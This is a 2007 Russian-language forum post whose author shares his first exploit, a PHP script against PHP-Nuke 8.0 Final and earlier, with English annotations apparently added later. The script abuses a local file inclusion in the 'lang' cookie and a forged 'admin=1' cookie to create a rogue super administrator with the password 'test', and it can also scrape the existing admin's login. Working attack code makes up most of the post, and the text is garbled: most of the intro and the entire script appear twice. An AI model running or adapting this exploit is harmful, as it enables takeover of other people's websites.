uNLike
12.04.2007, 11:31
Написал на днях эксплоит для PHP-Nuke (<= 8.0 Final): используется уже известная уязвимость локального включения файлов (local include) через cookie «lang», а также недочёт в авторизации админа (в запросе передаётся cookie «admin=1»). Позволяет добавить своего суперадмина. Похожих сплоитов нигде ещё не видел. Строго не судите — это мой первый сплоит :)
Поиск администратора (ветка с логином под обычным пользователем и разбором Members_List) писал в чисто учебно-познавательных целях: практика показала, что во много раз быстрее найти его вручную.
Сильно я его тоже не тестировал, на localhost точно работает :)
PS: Вспомогательные функции (работа с curl и разбор cookies) я также взял из какого-то другого сплоита :)
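<?php //exploit for PHP-nuke <=8.0 Final
//Coded by: uNlike
//local include in cookie "lang"
//
// Configuration. The script runs in one of two modes, chosen by $admin_login:
//  - $admin_login set (default "admin"): go straight to the exploit request
//    against admin.php.
//  - $admin_login empty: log in as a regular user ($login/$password) and
//    scrape the super admin's login from the Members_List page (user id 2).
// Every request goes through query() (curl). query() disables TLS certificate
// verification, so an https:// $host is open to interception on the path.
// The short open tag "<?" is off by default on modern PHP; "<?php" is used.
error_reporting(E_ALL & ~E_NOTICE & ~E_WARNING);
$login="";            // user login (only needed when $admin_login is left empty)
$password="";         // user password (only needed when $admin_login is left empty)
$admin_login="admin"; // super admin login; leave empty to discover it via Members_List
$admin_file="admin";  // path to admin panel without ".php": http://www.target.com/include/admin.php => "include/admin"
$host="http://www.target.com"; // target site: scheme + host, no trailing slash
$proxy="";            // SOCKS5 proxy "host:port" used by query(); "" = connect directly
$cookie_file_path = "/tmp/cookie"; // curl cookie jar for the login/discovery phase; any writable path works
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";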
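/////////////////
$cookie=array(); // cookies collected from the login response (name => value)
// Phase 1 (only when no super admin login was configured): log in as a
// regular user and read the super admin's login off the members list.
if (!$admin_login)
{
echo "Login...<br>";
$url=$host."/modules.php?name=Your_Account";
$reffer=$host."/index.php";
$post=array();
$post['op']="login";
$post['username']=$login;
$post['user_password']=$password;
// NOTE: the original had the variable name split as "$cookie_f ile_path",
// which is a parse error; it is the configured cookie jar.
$result=query($url,$agent,$proxy,$reffer,$cookie_file_path,$post,"");
$cook=getcookiee($result);
// getcookiee() may return nothing when the response carried no Set-Cookie.
if (is_array($cook)) { foreach ($cook as $k=>$v) { $cookie[$k]=$v; } }
// The login form being rendered again means the credentials were rejected.
if (strpos($result,'name="username" size="15" maxlength="25')!==false) {echo "<b>Login or password is invalid</b>"; exit;}
echo "Find superadmin...<br>";
$url=$host."/modules.php?name=Members_List";
$cookie_base="";
foreach ( $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; }
sleep(2); echo "."; // 2-second pause between requests (the original busy-waited here, printing dots)
$result=query($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_base);
// The logout link is taken as proof that the session is logged in.
if (strpos($result,'&op=logout&redirect=Forums')===false) {echo "<b>Super admin login was not found</b>"; exit; }
// The super admin is assumed to be user id 2; the login is presumably the
// text of the first tag after the profile link (offset 28, 30-byte window).
// Bail out when the link is absent instead of slicing from a false offset.
$start=strpos($result,'viewprofile&u=2');
if ($start===false) {echo "<b>Super admin login was not found</b>"; exit; }
$str=substr($result,$start+28,30);
$start=strpos($str,'>')+1;
$end=strpos($str,'<');
$len=$end-$start;
$admin_login=substr($str,$start,$len);
if ($len<=0 || $admin_login==="") {echo "<b>Super admin login was not found</b>"; exit; }
echo"Super admin login is <b>$admin_login</b>...<br>";
}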
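$cookie=array();
echo "Exploiting...<br>";
// Phase 2: one GET to admin.php that adds a new super admin (aid "test",
// password "test"). The admin login goes into the query string and is
// URL-encoded so a login with spaces or special characters does not break
// the request (a plain "admin" is unchanged).
$url=$host."/admin.php?aid=".urlencode($admin_login)."&op=AddAuthor&add_aid=test&add_name=god&add_email=test@test.tt&add_pwd=test&add_radminsuper=1";
$reffer=$host;
// "admin=1" is the cookie the post author reports as passing the admin check;
// "lang" is the local-include payload: the value is presumably appended to a
// language-file path, and the traversal redirects the include to
// admin/modules/authors (the authors module). Sent raw, as in the original.
$cookie_add="admin=1; lang=russian.php/../../admin/modules/authors;";
// A separate cookie jar (/tmp/cook) keeps the phase-1 user session out of
// these requests. The configured proxy is applied here as well, so no request
// bypasses it (the original sent this one directly).
$result=query($url,$agent,$proxy,$reffer,"/tmp/cook","",$cookie_add);
// Verify by logging in to the admin panel with the new account.
$url=$host."/".$admin_file.".php";
$reffer=$host."/".$admin_file.".php";
$post=array(); // fresh array: do not carry over the phase-1 login fields
$post['op']="login";
$post['aid']="test";
$post['pwd']="test";
sleep(2); echo "."; // 2-second pause (the original busy-waited here, printing dots)
$result=query($url,$agent,$proxy,$reffer,"/tmp/cook",$post,$cookie_add);
// The presence of _MODULESADMIN in the response is treated as a successful admin login.
if (strpos($result,'_MODULESADMIN')===false) {echo "<b>Error exploiting</b>"; exit; }
echo "Super admin was creat:<br> Login: <b>test</b><br> Password: <b>test</b>";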
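/**
 * Perform one HTTP request with curl and return headers + body as a string.
 *
 * @param string       $url              Full URL to request.
 * @param string       $agent            User-Agent header value.
 * @param string       $proxy            SOCKS5 proxy "host:port"; "" (or null) = direct connection.
 * @param string       $reffer           Referer header value.
 * @param string       $cookie_file_path curl cookie jar, read before and written after the request.
 * @param array|string $post             Array of POST fields, or "" for a GET request.
 * @param string       $cookie           Extra "name=value; ..." cookies sent with the request.
 * @return string Response headers and body (CURLOPT_HEADER is on), or a message
 *                starting with "Fucking Error: " when curl reports an error.
 *
 * NOTE(review): CURLOPT_SSL_VERIFYPEER/VERIFYHOST are disabled, so an https://
 * target is accepted with any certificate; an on-path attacker can read and
 * alter the traffic, including the credentials and cookies this script sends.
 * Redirects are followed (CURLOPT_FOLLOWLOCATION) and the cookie jar is shared
 * between calls that pass the same $cookie_file_path.
 */
function query($url,$agent,$proxy,$reffer,$cookie_file_path,$post,$cookie) {
$ch = curl_init ();
// curl_init() returns false on failure; report it in the same format as curl errors.
if ($ch === false) { return "Fucking Error: curl_init failed\r\n"; }
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if ($post!=="") {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
curl_setopt ($ch, CURLOPT_TIMEOUT, 120);
// An empty CURLOPT_PROXY explicitly disables proxy use (per libcurl, this
// also overrides *_proxy environment variables), so it is always set.
curl_setopt ($ch, CURLOPT_PROXY, $proxy);
curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt ($ch, CURLOPT_FAILONERROR, false);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_HEADER, 1);
$result = curl_exec($ch);
$error=curl_errno($ch);
curl_close ($ch);
// On error the response (if any) is discarded and replaced by a message;
// 7, 28 and 22 get a human-readable suffix.
if ($error) $result="Fucking Error: ".$error."\r\n";
if ($error==7) $result=$result." Failed to connect() to host or proxy.\r\n";
if ($error==28) $result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n";
if ($error==22) $result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n";
return $result;
}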
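/**
 * Collect cookies from the Set-Cookie headers of a raw HTTP response.
 *
 * Only the first "name=value" pair of each Set-Cookie line is taken: the
 * attributes after it (expires, path, domain, HttpOnly, ...) are not cookies
 * and must not be replayed to the server (the original skipped only
 * "expires" and stored the rest as cookies). Values are split on the first
 * "=" only, so values containing "=" survive intact. Header names are matched
 * case-insensitively. ereg(), used by the original, was removed in PHP 7.
 *
 * @param string $result Raw response as returned by query() (headers + body).
 * @return array name => value; empty array when no Set-Cookie header is present.
 */
function getcookiee($result) {
$cook = array();
foreach (explode("\n",$result) as $line) {
// Only lines that start with the header name count; a body line that
// merely mentions "Set-Cookie" is not a header.
if (!preg_match('/^Set-Cookie:\s*(.*)$/i', trim($line), $m)) continue;
$pairs = explode(";", $m[1]);
$first = trim($pairs[0]);
if ($first === "") continue;
$arr = explode("=", $first, 2);
$name = trim($arr[0]);
if ($name === "") continue;
$cook[$name] = isset($arr[1]) ? trim($arr[1]) : "";
}
return $cook;
}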
?>
Поиск администратора (ветка с логином под обычным пользователем и разбором Members_List) писал в чисто учебно-познавательных целях: практика показала, что во много раз быстрее найти его вручную.
Сильно я его тоже не тестировал, на localhost точно работает :)
PS: Вспомогательные функции (работа с curl и разбор cookies) я также взял из какого-то другого сплоита :)
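<?php //exploit for PHP-nuke <=8.0 Final
//Coded by: uNlike
//local include in cookie "lang"
//
// Configuration. The script runs in one of two modes, chosen by $admin_login:
//  - $admin_login set (default "admin"): go straight to the exploit request
//    against admin.php.
//  - $admin_login empty: log in as a regular user ($login/$password) and
//    scrape the super admin's login from the Members_List page (user id 2).
// Every request goes through query() (curl). query() disables TLS certificate
// verification, so an https:// $host is open to interception on the path.
// The short open tag "<?" is off by default on modern PHP; "<?php" is used.
error_reporting(E_ALL & ~E_NOTICE & ~E_WARNING);
$login="";            // user login (only needed when $admin_login is left empty)
$password="";         // user password (only needed when $admin_login is left empty)
$admin_login="admin"; // super admin login; leave empty to discover it via Members_List
$admin_file="admin";  // path to admin panel without ".php": http://www.target.com/include/admin.php => "include/admin"
$host="http://www.target.com"; // target site: scheme + host, no trailing slash
$proxy="";            // SOCKS5 proxy "host:port" used by query(); "" = connect directly
$cookie_file_path = "/tmp/cookie"; // curl cookie jar for the login/discovery phase; any writable path works
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";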
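/////////////////
$cookie=array(); // cookies collected from the login response (name => value)
// Phase 1 (only when no super admin login was configured): log in as a
// regular user and read the super admin's login off the members list.
if (!$admin_login)
{
echo "Login...<br>";
$url=$host."/modules.php?name=Your_Account";
$reffer=$host."/index.php";
$post=array();
$post['op']="login";
$post['username']=$login;
$post['user_password']=$password;
// NOTE: the original had the variable name split as "$cookie_f ile_path",
// which is a parse error; it is the configured cookie jar.
$result=query($url,$agent,$proxy,$reffer,$cookie_file_path,$post,"");
$cook=getcookiee($result);
// getcookiee() may return nothing when the response carried no Set-Cookie.
if (is_array($cook)) { foreach ($cook as $k=>$v) { $cookie[$k]=$v; } }
// The login form being rendered again means the credentials were rejected.
if (strpos($result,'name="username" size="15" maxlength="25')!==false) {echo "<b>Login or password is invalid</b>"; exit;}
echo "Find superadmin...<br>";
$url=$host."/modules.php?name=Members_List";
$cookie_base="";
foreach ( $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; }
sleep(2); echo "."; // 2-second pause between requests (the original busy-waited here, printing dots)
$result=query($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_base);
// The logout link is taken as proof that the session is logged in.
if (strpos($result,'&op=logout&redirect=Forums')===false) {echo "<b>Super admin login was not found</b>"; exit; }
// The super admin is assumed to be user id 2; the login is presumably the
// text of the first tag after the profile link (offset 28, 30-byte window).
// Bail out when the link is absent instead of slicing from a false offset.
$start=strpos($result,'viewprofile&u=2');
if ($start===false) {echo "<b>Super admin login was not found</b>"; exit; }
$str=substr($result,$start+28,30);
$start=strpos($str,'>')+1;
$end=strpos($str,'<');
$len=$end-$start;
$admin_login=substr($str,$start,$len);
if ($len<=0 || $admin_login==="") {echo "<b>Super admin login was not found</b>"; exit; }
echo"Super admin login is <b>$admin_login</b>...<br>";
}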
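$cookie=array();
echo "Exploiting...<br>";
// Phase 2: one GET to admin.php that adds a new super admin (aid "test",
// password "test"). The admin login goes into the query string and is
// URL-encoded so a login with spaces or special characters does not break
// the request (a plain "admin" is unchanged).
$url=$host."/admin.php?aid=".urlencode($admin_login)."&op=AddAuthor&add_aid=test&add_name=god&add_email=test@test.tt&add_pwd=test&add_radminsuper=1";
$reffer=$host;
// "admin=1" is the cookie the post author reports as passing the admin check;
// "lang" is the local-include payload: the value is presumably appended to a
// language-file path, and the traversal redirects the include to
// admin/modules/authors (the authors module). Sent raw, as in the original.
$cookie_add="admin=1; lang=russian.php/../../admin/modules/authors;";
// A separate cookie jar (/tmp/cook) keeps the phase-1 user session out of
// these requests. The configured proxy is applied here as well, so no request
// bypasses it (the original sent this one directly).
$result=query($url,$agent,$proxy,$reffer,"/tmp/cook","",$cookie_add);
// Verify by logging in to the admin panel with the new account.
$url=$host."/".$admin_file.".php";
$reffer=$host."/".$admin_file.".php";
$post=array(); // fresh array: do not carry over the phase-1 login fields
$post['op']="login";
$post['aid']="test";
$post['pwd']="test";
sleep(2); echo "."; // 2-second pause (the original busy-waited here, printing dots)
$result=query($url,$agent,$proxy,$reffer,"/tmp/cook",$post,$cookie_add);
// The presence of _MODULESADMIN in the response is treated as a successful admin login.
if (strpos($result,'_MODULESADMIN')===false) {echo "<b>Error exploiting</b>"; exit; }
echo "Super admin was creat:<br> Login: <b>test</b><br> Password: <b>test</b>";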
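/**
 * Perform one HTTP request with curl and return headers + body as a string.
 *
 * @param string       $url              Full URL to request.
 * @param string       $agent            User-Agent header value.
 * @param string       $proxy            SOCKS5 proxy "host:port"; "" (or null) = direct connection.
 * @param string       $reffer           Referer header value.
 * @param string       $cookie_file_path curl cookie jar, read before and written after the request.
 * @param array|string $post             Array of POST fields, or "" for a GET request.
 * @param string       $cookie           Extra "name=value; ..." cookies sent with the request.
 * @return string Response headers and body (CURLOPT_HEADER is on), or a message
 *                starting with "Fucking Error: " when curl reports an error.
 *
 * NOTE(review): CURLOPT_SSL_VERIFYPEER/VERIFYHOST are disabled, so an https://
 * target is accepted with any certificate; an on-path attacker can read and
 * alter the traffic, including the credentials and cookies this script sends.
 * Redirects are followed (CURLOPT_FOLLOWLOCATION) and the cookie jar is shared
 * between calls that pass the same $cookie_file_path.
 */
function query($url,$agent,$proxy,$reffer,$cookie_file_path,$post,$cookie) {
$ch = curl_init ();
// curl_init() returns false on failure; report it in the same format as curl errors.
if ($ch === false) { return "Fucking Error: curl_init failed\r\n"; }
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if ($post!=="") {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
curl_setopt ($ch, CURLOPT_TIMEOUT, 120);
// An empty CURLOPT_PROXY explicitly disables proxy use (per libcurl, this
// also overrides *_proxy environment variables), so it is always set.
curl_setopt ($ch, CURLOPT_PROXY, $proxy);
curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt ($ch, CURLOPT_FAILONERROR, false);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_HEADER, 1);
$result = curl_exec($ch);
$error=curl_errno($ch);
curl_close ($ch);
// On error the response (if any) is discarded and replaced by a message;
// 7, 28 and 22 get a human-readable suffix.
if ($error) $result="Fucking Error: ".$error."\r\n";
if ($error==7) $result=$result." Failed to connect() to host or proxy.\r\n";
if ($error==28) $result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n";
if ($error==22) $result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n";
return $result;
}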
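/**
 * Collect cookies from the Set-Cookie headers of a raw HTTP response.
 *
 * Only the first "name=value" pair of each Set-Cookie line is taken: the
 * attributes after it (expires, path, domain, HttpOnly, ...) are not cookies
 * and must not be replayed to the server (the original skipped only
 * "expires" and stored the rest as cookies). Values are split on the first
 * "=" only, so values containing "=" survive intact. Header names are matched
 * case-insensitively. ereg(), used by the original, was removed in PHP 7.
 *
 * @param string $result Raw response as returned by query() (headers + body).
 * @return array name => value; empty array when no Set-Cookie header is present.
 */
function getcookiee($result) {
$cook = array();
foreach (explode("\n",$result) as $line) {
// Only lines that start with the header name count; a body line that
// merely mentions "Set-Cookie" is not a header.
if (!preg_match('/^Set-Cookie:\s*(.*)$/i', trim($line), $m)) continue;
$pairs = explode(";", $m[1]);
$first = trim($pairs[0]);
if ($first === "") continue;
$arr = explode("=", $first, 2);
$name = trim($arr[0]);
if ($name === "") continue;
$cook[$name] = isset($arr[1]) ? trim($arr[1]) : "";
}
return $cook;
}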
?>